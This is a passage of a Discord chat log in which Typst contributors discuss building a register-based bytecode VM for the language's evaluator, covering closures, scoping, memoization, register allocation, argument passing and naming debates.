
        let register = compiler.reg();
        compiler.set(self.span(), value, register);
        Ok(register)
    }
}

#

Obviously some stuff like loops are much harder to do, but I plan on creating a nice-ish API for branching as well

#

Now here are the updated items missing:

Destructuring (the instruction exists but is not implemented)
Iteration (the instruction exists but is not implemented)
Import and include of other files

#

This means that I should be able to start compiling simple docs!!!!

sturdy sequoia Jan 20, 2024, 7:47 PM

#

https://tenor.com/view/illumination-asian-man-enlightened-oh-okay-gif-16379366

#

IT WORKS BABYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY

#

I AM SO FREAKING GOOD

#

GODDAMN

#

@left night ferrisWink

sly pecan Jan 20, 2024, 7:54 PM

#

now do your thesis

sturdy sequoia Jan 20, 2024, 7:55 PM

#

sly pecan now do your thesis

can't yet

#

modules are missing and closures don't work for some reason

sly pecan Jan 20, 2024, 7:55 PM

#

skill issue

feral imp Jan 20, 2024, 7:58 PM

#

There's still Sunday.

#

It's just so absurd to have a jit for a typesetting language. I just can't fathom this.

#

Not a jit but whatever this is.

sturdy sequoia Jan 20, 2024, 7:59 PM

#

feral imp It's just so absurd to have a jit for a typesetting language. I just can't fatho...

it's not a JIT, it's a bytecode based VM

feral imp Jan 20, 2024, 7:59 PM

#

I know, I know.

#

It's still wild.

sturdy sequoia Jan 20, 2024, 8:20 PM

#

feral imp It's still wild.

if you think of typst more as a jupyter alternative where you can build your visualizations (graphs, etc.) directly in, then I think it makes perfect sense

#

But tomorrow I won't have time to work on it

#

and it'll likely have to wait until next w-e

feral imp Jan 20, 2024, 8:22 PM

#

Another blanket shall be delivered. Good work!

lament fulcrum Jan 20, 2024, 8:23 PM

#

a jit would be fun though

#

and maybe even doable with cranelift as a pure rust dependency

tight glade Jan 20, 2024, 8:54 PM

#

sturdy sequoia Now there is the `Compile` trait which receives the `&mut Compiler` as an argume...

lovely!

tight glade Jan 20, 2024, 8:55 PM

#

sturdy sequoia ```rs compiler.set(self.span(), value, register); ```

nice

tight glade Jan 20, 2024, 8:55 PM

#

sturdy sequoia

niiiiiiiiiiiiice

#

What do you think of naming that compile trait ByteCode instead? (yes I love bikeshedding :p)

sturdy sequoia Jan 20, 2024, 9:00 PM

#

tight glade What do you think of naming that compile trait `ByteCode` instead? (yes I love b...

I actually think we should change the nomenclature in the rest of typst to refer to compiling the document as typeset, compiling the modules as… compiling, and evaluating the code as evaluation

#

I think it overall makes more sense

tight glade Jan 20, 2024, 9:01 PM

#

compiling the module into what? modules? 🤣

left night Jan 20, 2024, 9:06 PM

#

sturdy sequoia I actually think we should change the nomenclature in the rest of typst to refer...

but the CLI command is typst compile. do you want to change that to typst typeset too?

#

and the thing is called the compiler of the Typst typesetting language

sturdy sequoia Jan 20, 2024, 9:11 PM

#

left night but the CLI command is `typst compile`. do you want to change that to `typst typ...

no, change that

#

but the function internally is called typeset

glad urchin Jan 20, 2024, 9:12 PM

#

well yea i guess Compile could be a bit generic perhaps

#

maybe ByteCodeCompile?

#

or VmCompile

sturdy sequoia Jan 20, 2024, 9:12 PM

#

glad urchin maybe `ByteCodeCompile`?

eewww way too long 😂

glad urchin Jan 20, 2024, 9:13 PM

#

yea

#

ByteCode on its own is probably a better idea than ByteCodeCompile

#

though VmCompile doesn't sound that bad either

tight glade Jan 20, 2024, 9:14 PM

#

sturdy sequoia eewww way too long 😂

Come on just ByteCode :p

tight glade Jan 20, 2024, 9:14 PM

#

glad urchin though `VmCompile` doesn't sound that bad either

less cool 😎

sturdy sequoia Jan 20, 2024, 9:14 PM

#

tight glade Come on just ByteCode :p

Compile is really fine :-p

#

Stop bikeshedding angryeyes

left night Jan 20, 2024, 9:15 PM

#

sturdy sequoia but the function internally is called `typeset`

but that'd be inconsistent too

sturdy sequoia Jan 20, 2024, 9:15 PM

#

fn typeset(
    world: Tracked<dyn World + '_>,
    tracer: &mut Tracer,
    content: &Content,
) -> SourceResult<Document> {

#

I mean you wrote it 😄

left night Jan 20, 2024, 9:16 PM

#

but it's not the full compilation

#

it's just the post-eval phases

sturdy sequoia Jan 20, 2024, 9:17 PM

#

left night it's just the post-eval phases

well yes

left night Jan 20, 2024, 9:17 PM

#

I thought you wanted to rename the public compile function

sturdy sequoia Jan 20, 2024, 9:17 PM

#

now we have
compile -> eval -> typeset -> export internally

sturdy sequoia Jan 20, 2024, 9:17 PM

#

left night I thought you wanted to rename the public `compile` function

no no I meant internally

left night Jan 20, 2024, 9:18 PM

#

I'm not sure I follow. Would you rename any of the existing functions?

sturdy sequoia Jan 20, 2024, 9:19 PM

#

left night I'm not sure I follow. Would you rename any of the existing functions?

no

#

I am just defending the Compile name for the trait

#

😂

left night Jan 20, 2024, 9:21 PM

#

ah

#

I think it's okay

sturdy sequoia Jan 20, 2024, 9:21 PM

#

Thanks ❤️

left night Jan 20, 2024, 9:22 PM

#

I would probably also have called it that

#

But I guess I also have named both Trace and Tracer which are completely unrelated.

#

on an unrelated note: do you use cargo check or cargo clippy as rust-analyzer's check command?

#

because regarding performance I have found that going back to cargo check makes my IDE much more performant.

#

a bit unfortunate that I have to call cargo clippy manually now to ensure that CI will pass

cunning wadi Jan 20, 2024, 9:25 PM

#

are you using auto-save?

left night Jan 20, 2024, 9:26 PM

#

no

#

but it still takes between 5-15s to update diagnostics

#

after save

cunning wadi Jan 20, 2024, 9:26 PM

#

that is a lot

#

much more than on my machine for sure

left night Jan 20, 2024, 9:27 PM

#

which is why I'm actually saving less often, and mostly after having done a batch of changes

sturdy sequoia Jan 20, 2024, 9:27 PM

#

left night on an unrelated note: do you use cargo check or cargo clippy as rust-analyzer's ...

I think I use check but not sure

left night Jan 20, 2024, 9:27 PM

#

cunning wadi much more than on my machine for sure

did you test it on typst recently?

cunning wadi Jan 20, 2024, 9:27 PM

#

I did not, let me check

left night Jan 20, 2024, 9:28 PM

#

it's a little slower since the two main crates were merged

#

the diagnostics also come step by step. when doing a larger refactor, I can see folder by folder getting red

#

as mentioned before, for me (in VS Code) diagnostics completely disappear when saving and only come back once the new ones are available (even the unchanged ones). which is a bit of a pain.

sly pecan Jan 20, 2024, 9:29 PM

#

left night but the CLI command is `typst compile`. do you want to change that to `typst typ...

typst bikeshed

left night Jan 20, 2024, 9:30 PM

#

typst t shorthand could also mean test I just noticed and, in fact, test is a subword of typeset.

#

for some definition of subword

left night Jan 20, 2024, 9:31 PM

#

cunning wadi that is a lot

I should also add that it differs. if the project has currently many errors, it takes longer, closer to 15s maybe. if it's in a compiling state, closer to 5s.

cunning wadi Jan 20, 2024, 9:33 PM

#

cunning wadi I did not, let me check

it's 2-6s for me

#

and I've been running a program for a few hours now that constantly takes up two threads

#

might just be the processor though

left night Jan 20, 2024, 9:37 PM

#

I must admit that I haven't actually measured. I just know that it feels pretty slow at times. But I think the worst times might have been on battery rather than plugged in.

#

But even though M1 is impressive, your desktop might also just be faster.

cunning wadi Jan 20, 2024, 9:37 PM

#

yeah, it's probably that

#

(after mainly using the work laptop for a while I definitely do notice the improved performance, even when just navigating in the editor)

#

(though that one has got an eighth gen low powered intel processor, so, not exactly the most powerful device on the market)

sly pecan Jan 20, 2024, 9:40 PM

#

The difference between desktop cpu and a laptop one is that the desktop one can operate at max power for an extended period of time

#

Laptop ones cannot for thermal reasons

cunning wadi Jan 20, 2024, 9:40 PM

#

yeah

sturdy sequoia Jan 20, 2024, 9:42 PM

#

sly pecan The difference between desktop cpu and a laptop one is that the desktop one can ...

yes but incremental compilation and autocomplete are very bursty loads

#

so the difference in continuous TDP shouldn't matter that much

feral imp Jan 20, 2024, 9:45 PM

#

when I write pointer-code, unsafe code, clippy is too much anyways, and will fail code that builds/compiles. I'd use cargo check as r-a check command as a standard..

cunning wadi Jan 20, 2024, 9:48 PM

#

that sounds like the unsafe code might be doing things it should not be doing

sturdy sequoia Jan 20, 2024, 11:20 PM

#

I'm happy to say I fixed closures!

#

= Hello, world!

#set text(fill: red)
The lazy fox jumped over the brown dog.

#let call_once(fn) = { (fn)(100) }

#call_once(lorem)

#

This for example can already compile 😉

#

So it's really getting there! 😄

tight glade Jan 20, 2024, 11:24 PM

#

lovely 😄

sturdy sequoia Jan 20, 2024, 11:43 PM

#

Ok, I found a very sneaky bug with register remapping, I'm pretty sure it's correct now 😄

#

(basically I could remap the output register without re-assigning it)

#

Ok so I'm having issues with captured values in closures, I'll try and figure it out tomorrow

sturdy sequoia Jan 21, 2024, 12:00 PM

#

@left night How are # before a value rejected normally? Because from what I can tell it should be at the lexer level? But for some reason it's allowing it in code mode 😐

#

ah no okay I need to extract the errors separately my bad

sturdy sequoia Jan 21, 2024, 12:22 PM

#

I fixed closure scopes and captured values 🎉

#

And now I fixed scopes during eval

sly pecan Jan 21, 2024, 12:39 PM

#

sturdy sequoia I fixed closure scopes and captured values 🎉

Thesis when

sturdy sequoia Jan 21, 2024, 12:43 PM

#

sly pecan Thesis when

soon™️

#

We can now iterate over values 🎉

#

only missing now:

destructuring
modules

glossy shore Jan 21, 2024, 1:10 PM

#

destructuring ought to be easy

sturdy sequoia Jan 21, 2024, 1:11 PM

#

glossy shore destructuring ought to be easy

yes, I just need to adapt the old code 😉

#

modules won't be too hard either imo

#

I have a pretty good idea of how to implement them relatively easily

tight glade Jan 21, 2024, 1:34 PM

#

Doing so good @sturdy sequoia

glossy shore Jan 21, 2024, 1:42 PM

#

sturdy sequoia I have a pretty good idea of how to implement them relatively easily

Without taking runtime imports, I presume

sturdy sequoia Jan 21, 2024, 1:43 PM

#

glossy shore Without taking runtime imports, I presume

Indeed, runtime import just won't be supported

glossy shore Jan 21, 2024, 1:44 PM

#

good.

sturdy sequoia Jan 21, 2024, 1:44 PM

#

glossy shore _good._

Why specifically?

#

I think it's error prone but I'm curious what you think 😉

glossy shore Jan 21, 2024, 1:44 PM

#

yeah mostly error prone

sturdy sequoia Jan 21, 2024, 1:44 PM

#

mind you #include will work the same as before

#

just #import is changing

glossy shore Jan 21, 2024, 1:44 PM

#

mhm

sturdy sequoia Jan 21, 2024, 1:45 PM

#

(for now at least)

glossy shore Jan 21, 2024, 1:45 PM

#

module imports just feel like they should be analogous to Rust use

#

if I write if cond { import "mod.typ"; } what's the scope of the import? Just the conditional?

sturdy sequoia Jan 21, 2024, 1:46 PM

#

glossy shore if I write `if cond { import "mod.typ"; }` what's the scope of the import? Just ...

Right now it'll be just the conditional, yeah

glossy shore Jan 21, 2024, 1:48 PM

#

is that already the case?

glad urchin Jan 21, 2024, 1:50 PM

#

sturdy sequoia Indeed, runtime import just won't be supported

Sorry, what does "runtime import" mean here?

#

As in being able to conditionally import?

#

Or being able to provide a "dynamic string" to imports

glossy shore Jan 21, 2024, 1:50 PM

#

dynamic string is what I meant

sturdy sequoia Jan 21, 2024, 1:52 PM

#

glad urchin Or being able to provide a "dynamic string" to imports

dynamic strings

#

you will still be able to conditionally import

sturdy sequoia Jan 21, 2024, 2:37 PM

#

Import and Include are in

#

just destructure left 🎉

feral imp Jan 21, 2024, 2:49 PM

#

If you finish today, and it changes performance by +-20% on thesis, we'll need to go on voice chat and celebrate/rant.....................

sly pecan Jan 21, 2024, 2:50 PM

#

10x slower

sturdy sequoia Jan 21, 2024, 2:53 PM

#

sly pecan 10x slower

💀

#

Stop being mean 😭

sturdy sequoia Jan 21, 2024, 2:53 PM

#

feral imp If you finish today, and it changes performance by +-20% on thesis, we'll need t...

I mean, just destructuring

#

then debugging

#

ferrisForgor

sly pecan Jan 21, 2024, 3:03 PM

#

sturdy sequoia Stop being mean 😭

sturdy sequoia Jan 21, 2024, 3:13 PM

#

Destructuring is in

#

Destructuring works 😎

#

For those wondering, without the doc (there is some but very sparse), the compiler and executors are close to 6k lines long

#

ferrisForgor

#

Poor @left night

#

With the doc and cleanup it'll likely be in the neighborhood of 10k lines

#

😄

#

The first ever document compiled with the new eval

#

Ok so it's very picky about failing to remap registers

#

😐

#

= Hello, world!

#show "Lorem": text(fill: red, "Lo")

#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)
#lorem(30)

#

This uses too many registers 😂

#

I figured out why

sturdy sequoia Jan 21, 2024, 3:55 PM

#

It's 450 times slower 😂

#

Probably because of compilation lol

#

IT'S FASTER

#

@feral imp @sly pecan IT IS FASTER

#

https://tenor.com/view/evil-laugh-gif-25608698


feral imp Jan 21, 2024, 4:01 PM

#

thank god.

sturdy sequoia Jan 21, 2024, 4:01 PM

#

(I had forgotten to memoize closure calls 💀)

feral imp Jan 21, 2024, 4:01 PM

#

we were literally holding our breath.

sturdy sequoia Jan 21, 2024, 4:02 PM

#

Now onto fix the bug so that I can test it on masterproef 😎

glad urchin Jan 21, 2024, 4:02 PM

#

sturdy sequoia (I had forgotten to memoize closure calls 💀)

imagine running lorem(30) 5 times

feral imp Jan 21, 2024, 4:02 PM

#

sturdy sequoia (I had forgotten to memoize closure calls 💀)

I could have told you to do that 🤣 /s /s /s

glad urchin Jan 21, 2024, 4:02 PM

#

scare away typsters with this simple trick

sturdy sequoia Jan 21, 2024, 4:02 PM

#

glad urchin imagine running `lorem(30)` 5 times

I'm running fibonacci(30)

glad urchin Jan 21, 2024, 4:02 PM

#

wa

#

what did you send then

sturdy sequoia Jan 21, 2024, 4:02 PM

#

glad urchin what did you send then

oh, a piece of code that didn't compile lol

glad urchin Jan 21, 2024, 4:02 PM

#

ohok

sturdy sequoia Jan 21, 2024, 4:03 PM

#

I think tonight masterproef will compile using the new compiler 😄

lunar kettle Jan 21, 2024, 4:04 PM

#

sturdy sequoia I think tonight masterproef will compile using the new compiler 😄

famous last words

feral imp Jan 21, 2024, 4:05 PM

#

For 10k loc I bet laurmaedje needs it to be a bit fast.

sturdy sequoia Jan 21, 2024, 4:22 PM

#

feral imp For 10k loc I bet laurmaedje needs it to be a bit fast.

I mean it replaces about 3k loc

#

Ok, it's a lot less than I thought

glad urchin Jan 21, 2024, 4:37 PM

#

im more impressed that you did this in like a few days

#

:p

#

i dont have that much free time 😂

sturdy sequoia Jan 21, 2024, 5:32 PM

#

THERE ARE NO MORE todo!()

tight glade Jan 21, 2024, 5:34 PM

#

!!!! ❤️❤️❤️

#

The guy is blazing fast

#

By the thesis!

sturdy sequoia Jan 21, 2024, 5:35 PM

#

I mean there are bugs, I am now fixing the tests 😄

#

Actually most of the failed tests are just slight span differences

feral imp Jan 21, 2024, 5:52 PM

#

waiting intensifies for Goossa; Will typst performance exceed what Man has yet to witness?

low sapphire Jan 21, 2024, 5:53 PM

#

@sturdy sequoia have you already submitted your thesis or is optimizing Typst just part of your procrastination? xD

sturdy sequoia Jan 21, 2024, 5:53 PM

#

low sapphire <@130737672951037952> have you already submitted your thesis or is optimizing Ty...

I got 18/20 on my thesis :-p

low sapphire Jan 21, 2024, 5:53 PM

#

ok haha nice 😄

lunar kettle Jan 21, 2024, 5:59 PM

#

@sturdy sequoia where are the numberssss

#

how much faster/slower on your thesis?

feral imp Jan 21, 2024, 6:02 PM

#

lunar kettle how much faster/slower on your thesis?

We are waaaaiting..

glad urchin Jan 21, 2024, 6:03 PM

#

lunar kettle how much faster/slower on your thesis?

IIUC It can't compile the thesis yet

lunar kettle Jan 21, 2024, 6:03 PM

#

sturdy sequoia I think tonight masterproef will compile using the new compiler 😄

I mean

glad urchin Jan 21, 2024, 6:03 PM

#

But maybe today? :p

lunar kettle Jan 21, 2024, 6:04 PM

#

Dherse stands by his word ~~except when it comes to gradients~~

glad urchin Jan 21, 2024, 6:04 PM

#

Well "tonight" has just started in their timezone I believe

#

So let's give Dherse some time 😂

sly pecan Jan 21, 2024, 6:05 PM

#

sturdy sequoia Actually most of the failed tests are just slight span differences

Shouldn't the output be identical?

sturdy sequoia Jan 21, 2024, 6:22 PM

#

sly pecan Shouldn't the output be identical?

my compiler generally takes bigger spans at the moment

#

but I'll work on improving it!

sly pecan Jan 21, 2024, 7:09 PM

#

sturdy sequoia my compiler generally takes bigger spans at the moment

I don't know what a span is, but good job!

feral imp Jan 21, 2024, 7:25 PM

#

https://tenor.com/view/spam-spamalert-gif-20933994


tight glade Jan 21, 2024, 8:53 PM

#

I love seeing everyone so invested in your work Dherse 😁❤️

glossy shore Jan 21, 2024, 9:05 PM

#

it's a good investment

sturdy sequoia Jan 21, 2024, 9:13 PM

#

sly pecan I don't know what a span is, but good job!

A Span is basically an ID to somewhere in the (typst) source

sly pecan Jan 21, 2024, 9:13 PM

#

So what does having bigger spans mean?

sturdy sequoia Jan 21, 2024, 9:13 PM

#

sly pecan So what does having bigger spans mean?

It means it globs more of your code

#

so instead of this it might be this. that gets globbed

#

obviously not great but I plan on improving upon that later

sly pecan Jan 21, 2024, 9:16 PM

#

Does it have consequence for the actual output?

sturdy sequoia Jan 21, 2024, 9:16 PM

#

sly pecan Does it have consequence for the actual output?

no

#

but it might affect preview <-> source click (in the webapp)

#

and it makes most tests fail

sly pecan Jan 21, 2024, 9:16 PM

#

How fast is your thesis?

#

Most important question

sturdy sequoia Jan 21, 2024, 9:17 PM

#

I don't know yet, I am tracking down two bugs that prevent me from compiling it

#

and I took a long break

sturdy sequoia Jan 21, 2024, 9:49 PM

#

Ok so there's still something wrong with scopes

#

and methods will be the death of me

#

they're parsed so... weirdly

feral imp Jan 21, 2024, 9:52 PM

#

time to.. rewrite typst?

low sapphire Jan 21, 2024, 10:10 PM

#

rewrite it in Zig

sturdy sequoia Jan 21, 2024, 10:16 PM

#

https://tenor.com/view/vomit-puke-ugh-gif-25512927


sturdy sequoia Jan 21, 2024, 10:45 PM

#

Ok so, doing register optimization S-U-C-K-S

#

I am going for another method of re-using registers

sturdy sequoia Jan 21, 2024, 11:05 PM

#

I'm happy to say that this new method shaved a good 2k lines from the total

west light Jan 21, 2024, 11:18 PM

#

sturdy sequoia Ok so, doing register optimization S-U-C-K-S

I quite like it. I like using https://godbolt.org/ to see how tight my loops are. But it’s probably more useful for micro-controllers. I have no idea what it’s like on big-boy systems.


glad urchin Jan 21, 2024, 11:18 PM

#

west light I quite like it. I like using https://godbolt.org/ to see how tight my loops are...

i think they're talking about registers in their VM

west light Jan 21, 2024, 11:21 PM

#

glad urchin i think they're talking about registers in their VM

Oh boy. … that's some new sort of fun. But wouldn’t that technically be cached vs register? I suppose it depends on the host system.

sturdy sequoia Jan 21, 2024, 11:24 PM

#

west light Oh boy. … that some new sort of fun. But wouldn’t that technically be cache’d vs...

no no

#

I am building a typst VM for faster eval

#

and it uses registers

#

😂

west light Jan 21, 2024, 11:29 PM

#

sturdy sequoia and it uses registers

So it uses custom instructions and virtual registers…. And you’re working on jit optimization? … mostly guessing. How wide are the registers, how many are used?

cunning wadi Jan 21, 2024, 11:30 PM

#

This does not include a JIT

#

Register optimization is simply the process of choosing the best registers so that as few moves or interactions with the stack as possible have to occur

#

It's 32 registers. Their width I don't know

#

But the registers aren't simply 64 bit numbers like in hardware, but complex values

#

At least I assume as much

west light Jan 21, 2024, 11:37 PM

#

cunning wadi Register optimization is simply the process of choosing the best registers so th...

Wouldn’t that need to assume the most common instructions/stack operations?

sly pecan Jan 21, 2024, 11:38 PM

#

west light Wouldn’t that need to assume the most common instructions/stack operations?

Considering it's a very specific workload it wouldn't really be guessing per se?

cunning wadi Jan 21, 2024, 11:38 PM

#

It just needs to check things like whether the value of one register is still being required

sturdy sequoia Jan 21, 2024, 11:38 PM

#

cunning wadi It just needs to check things like whether the value of one register is still be...

Exactly. Before, I was doing it in a post-process pass, but I realized that I can just do it as I go, which is much faster and easier
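To make the "do it as I go" idea concrete, here is a minimal sketch of an on-the-fly register allocator. It is not the code from the branch being discussed: `Register`, `RegisterAllocator`, and the bitmask bookkeeping are assumptions for illustration. Only the 32-register budget comes from the conversation.

```rust
/// Hypothetical register handle; 32 registers fit in a `u8` index.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
struct Register(u8);

/// Tracks which of the 32 registers hold a value that is still needed.
#[derive(Debug, Default)]
struct RegisterAllocator {
    /// Bit `i` is set while register `i` is live.
    in_use: u32,
}

impl RegisterAllocator {
    /// Hands out the lowest free register, or `None` if all 32 are live.
    fn allocate(&mut self) -> Option<Register> {
        let free = !self.in_use;
        if free == 0 {
            return None;
        }
        let index = free.trailing_zeros() as u8;
        self.in_use |= 1u32 << index;
        Some(Register(index))
    }

    /// Marks a register as reusable once its value is no longer required.
    fn release(&mut self, reg: Register) {
        self.in_use &= !(1u32 << reg.0);
    }
}
```

The compiler would call `allocate` when it needs a temporary and `release` as soon as the expression that consumed it has been emitted, so no separate liveness pass over the finished bytecode is needed.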

cunning wadi Jan 21, 2024, 11:39 PM

#

Or it could determine that one register should be used for something else instead and the existing value can simply be dropped onto the stack in the meantime

west light Jan 21, 2024, 11:39 PM

#

sturdy sequoia Exactly, but before I was doing in a post-process pass, but I realized that I ca...

Faster easier == better solution

glad urchin Jan 21, 2024, 11:40 PM

#

west light Faster easier == better solution

*footnote: it also causes all system files to be instantly deleted

sturdy sequoia Jan 21, 2024, 11:40 PM

#

cunning wadi Or it could determine that one register should be used for something else instea...

Mind you, we don't have a stack

#

I mean we have more than one

#

but they're for very specific situations

#

for example we have an iterator stack to store rust native iterators in loops

#

since typst doesn't have iterators
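A rough sketch of what such an iterator stack could look like, assuming a toy `Value` type and hypothetical method names (`enter`, `advance`, `exit`); the real VM's types are certainly richer than this.

```rust
/// Toy value type, an assumption for this sketch.
#[derive(Debug, Clone, PartialEq)]
enum Value {
    Int(i64),
    Array(Vec<Value>),
}

/// Side stack that owns one native Rust iterator per loop in flight.
#[derive(Default)]
struct IteratorStack {
    stack: Vec<Box<dyn Iterator<Item = Value>>>,
}

impl IteratorStack {
    /// Entering a loop: turn the iterable into a native iterator.
    fn enter(&mut self, iterable: Value) {
        let iter: Box<dyn Iterator<Item = Value>> = match iterable {
            Value::Array(items) => Box::new(items.into_iter()),
            // Simplification: anything else is iterated as a single item.
            other => Box::new(std::iter::once(other)),
        };
        self.stack.push(iter);
    }

    /// One loop step: advance the innermost iterator.
    fn advance(&mut self) -> Option<Value> {
        self.stack.last_mut()?.next()
    }

    /// Leaving the loop: drop its iterator.
    fn exit(&mut self) {
        self.stack.pop();
    }
}

/// Nested loops only ever touch the top of the stack.
fn sum_nested(rows: Value) -> i64 {
    let mut iters = IteratorStack::default();
    let mut total = 0;
    iters.enter(rows);
    while let Some(row) = iters.advance() {
        iters.enter(row);
        while let Some(item) = iters.advance() {
            if let Value::Int(n) = item {
                total += n;
            }
        }
        iters.exit();
    }
    iters.exit();
    total
}
```

Keeping the iterators on a side stack means they never have to be represented as values in registers.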

cunning wadi Jan 21, 2024, 11:41 PM

#

What happens when a function is called?

#

Where does the context of the calling function end up

sturdy sequoia Jan 21, 2024, 11:42 PM

#

cunning wadi What happens when a function is called?

it copies all of the captured values into the function's scope, same with the args, then spins up a new VM

#

the reason why it spins up a new VM is because the calls get memoized

#

and the VMs are dirt cheap to initialize since they mostly borrow values
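The call path described here could be sketched roughly as follows. Everything in it is an assumption for illustration: the bytecode is reduced to a plain function pointer, values are `i64`, and a `HashMap` stands in for whatever memoization layer the real implementation uses.

```rust
use std::collections::HashMap;

/// Hypothetical compiled closure; `body` stands in for its bytecode.
struct Closure {
    id: u32,
    captured: Vec<i64>,
    body: fn(&Vm<'_>) -> i64,
}

/// A short-lived VM that only borrows the data it runs on,
/// which is why creating one per call is cheap.
struct Vm<'a> {
    captured: &'a [i64],
    args: &'a [i64],
}

/// Memoizes calls by closure identity and arguments.
#[derive(Default)]
struct CallCache {
    results: HashMap<(u32, Vec<i64>), i64>,
    misses: usize,
}

impl CallCache {
    fn call(&mut self, closure: &Closure, args: &[i64]) -> i64 {
        let key = (closure.id, args.to_vec());
        if let Some(&hit) = self.results.get(&key) {
            return hit; // Same closure, same args: no VM is started.
        }
        self.misses += 1;
        // Fresh VM per call; it borrows captures and arguments.
        let vm = Vm { captured: &closure.captured, args };
        let result = (closure.body)(&vm);
        self.results.insert(key, result);
        result
    }
}

/// Example body: first captured value plus the sum of the arguments.
fn add_offset(vm: &Vm<'_>) -> i64 {
    vm.captured[0] + vm.args.iter().sum::<i64>()
}
```

Because each call is a self-contained unit keyed on its inputs, a repeated call with identical inputs can be answered from the cache without running any bytecode.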

cunning wadi Jan 21, 2024, 11:42 PM

#

Huh

sturdy sequoia Jan 21, 2024, 11:43 PM

#

So it's not as fast as possible but that isn't the goal either

cunning wadi Jan 21, 2024, 11:43 PM

#

Do the arguments not end up in specific registers but instead some special value then?

sturdy sequoia Jan 21, 2024, 11:44 PM

#

cunning wadi Do the arguments not end up in specific registers but instead some special value...

they end up in a list of arguments, and the function gets them one-by-one into registers

#

I plan on replacing locals and args with registers but I haven't done it yet

west light Jan 21, 2024, 11:44 PM

#

sturdy sequoia the reason why it spins up a new VM is because the calls get memoized

Not an option I usually have access to. But I like it.

cunning wadi Jan 21, 2024, 11:44 PM

#

What happens if a function takes more than 32 arguments?

sturdy sequoia Jan 21, 2024, 11:44 PM

#

west light Not an option I usually have access to. But I like it.

Again, it's not a VM in the traditional sense, it's a VM like the Java VM

sturdy sequoia Jan 21, 2024, 11:44 PM

#

cunning wadi What happens if a function takes more than 32 arguments?

yeah then you'd be out of registers 😄

#

There is no stack 😂

#

Mind you you can call a function with more than 32 args

glad urchin Jan 21, 2024, 11:45 PM

#

sturdy sequoia Mind you you can call a function with more than 32 args

does it blow up Typst then?

#

crash and burn?

west light Jan 21, 2024, 11:45 PM

#

Is a dictionary one argument?

sturdy sequoia Jan 21, 2024, 11:45 PM

#

glad urchin does it blow up Typst then?

no, it just works

sturdy sequoia Jan 21, 2024, 11:45 PM

#

west light Is a dictionary one argument?

I don't understand the question

cunning wadi Jan 21, 2024, 11:46 PM

#

sturdy sequoia Mind you you can call a function with more than 32 args

Where do the excess arguments end up?

#

That was my actual question

sturdy sequoia Jan 21, 2024, 11:46 PM

#

cunning wadi Where do the excess arguments end up?

basically, it allocates a Value::Args in a register and it pushes them into it one-by-one, so you can call with as many args as you want

#

When a function is called, it loads the arguments into registers on use

cunning wadi Jan 21, 2024, 11:47 PM

#

Oh I see

sturdy sequoia Jan 21, 2024, 11:47 PM

#

So you can have as many args as you want
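A small sketch of that calling convention, assuming a toy `Value` enum and hypothetical `push_arg` / `take_args` operations (only `Value::Args` is named in the conversation): the caller accumulates arguments in a single register, so the number of arguments is not bounded by the number of registers.

```rust
/// Toy value type; only `Args` is taken from the discussion.
#[derive(Debug, Clone, PartialEq)]
enum Value {
    None,
    Int(i64),
    Args(Vec<Value>),
}

struct Vm {
    registers: Vec<Value>,
}

impl Vm {
    fn new() -> Self {
        Self { registers: vec![Value::None; 32] }
    }

    /// Caller side: append the value in `src` to the `Args` held in `dst`,
    /// creating the list on the first push.
    fn push_arg(&mut self, dst: usize, src: usize) {
        let value = self.registers[src].clone();
        if self.registers[dst] == Value::None {
            self.registers[dst] = Value::Args(Vec::new());
        }
        if let Value::Args(list) = &mut self.registers[dst] {
            list.push(value);
        }
    }

    /// Hands the argument list to the callee by value and empties the register.
    fn take_args(&mut self, reg: usize) -> Vec<Value> {
        match std::mem::replace(&mut self.registers[reg], Value::None) {
            Value::Args(list) => list,
            _ => Vec::new(),
        }
    }
}
```

Pushing forty arguments through one source register works the same way as pushing two; only the list inside the `Args` register grows.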

west light Jan 21, 2024, 11:47 PM

#

I’m just guessing the arguments are by pointer and that there's typically just one Args item

sturdy sequoia Jan 21, 2024, 11:47 PM

#

west light I’m just guessing the arguments are by pointer and that there typically just one...

indeed, it's just one Args passed by value

west light Jan 21, 2024, 11:48 PM

#

Or perhaps nothing.

sturdy sequoia Jan 21, 2024, 11:51 PM

#

west light Or perhaps nothing.

indeed, if there are no args it doesn't bother to allocate anything

west light Jan 21, 2024, 11:54 PM

#

So what do the other 31 registers do? Do you mark them as in use and just allocate deallocate them based on need?

sturdy sequoia Jan 21, 2024, 11:55 PM

#

west light So what do the other 31 registers do? Do you mark them as in use and just alloca...

basically, but in a function being called arguments are stored in their own special purpose registers

#

so you always have 32 registers

#

it's only when you're calling a function that it uses the Args data structure

#

Ok, methods are finally fixed afaik

#

Now all that's left are the scopes being a bit borked yet again

#

but I'll fix that next time I have time to work on it

#

I mean I did figure it out: (noting here for future me)
It cannot capture from the parent's parent's scope. This means that I need to create a bigger hierarchy of captures and be able to do recursive capturing, not particularly hard but I need to do it
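One way the recursive capturing could work, as a sketch under assumed names (`FunctionScope`, `Compiler::resolve`, `Access`): when a name is not local, the enclosing function is asked to resolve it first, which forces every intermediate closure to capture it too.

```rust
use std::collections::HashMap;

/// How a compiled function reaches a variable.
#[derive(Debug, Clone, Copy, PartialEq)]
enum Access {
    Local(usize),
    Captured(usize),
}

/// Per-function bookkeeping during compilation (hypothetical).
#[derive(Default)]
struct FunctionScope {
    locals: HashMap<String, usize>,
    captures: Vec<String>,
}

/// `scopes[0]` is the outermost function, the last entry the innermost.
struct Compiler {
    scopes: Vec<FunctionScope>,
}

impl Compiler {
    fn resolve(&mut self, depth: usize, name: &str) -> Option<Access> {
        if let Some(&slot) = self.scopes[depth].locals.get(name) {
            return Some(Access::Local(slot));
        }
        if let Some(index) = self.scopes[depth].captures.iter().position(|c| c == name) {
            return Some(Access::Captured(index));
        }
        if depth == 0 {
            return None;
        }
        // Recursive step: the parent must be able to provide the value,
        // capturing it from its own parent if necessary.
        self.resolve(depth - 1, name)?;
        let captures = &mut self.scopes[depth].captures;
        captures.push(name.to_string());
        Some(Access::Captured(captures.len() - 1))
    }
}
```

With three nested functions, resolving `x` in the innermost one adds `x` to the captures of the middle function as well, which is the parent's-parent case noted above.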

tight glade Jan 22, 2024, 9:28 AM

#

glad urchin *footnote: it also causes all system files to be instantly deleted

Still the best solution 😂

tight glade Jan 22, 2024, 9:30 AM

#

sturdy sequoia I mean I did figure it out: (noting here for future me) It cannot capture from t...

Exciting times

sturdy sequoia Jan 22, 2024, 11:47 AM

#

I fixed the scoping issues

#

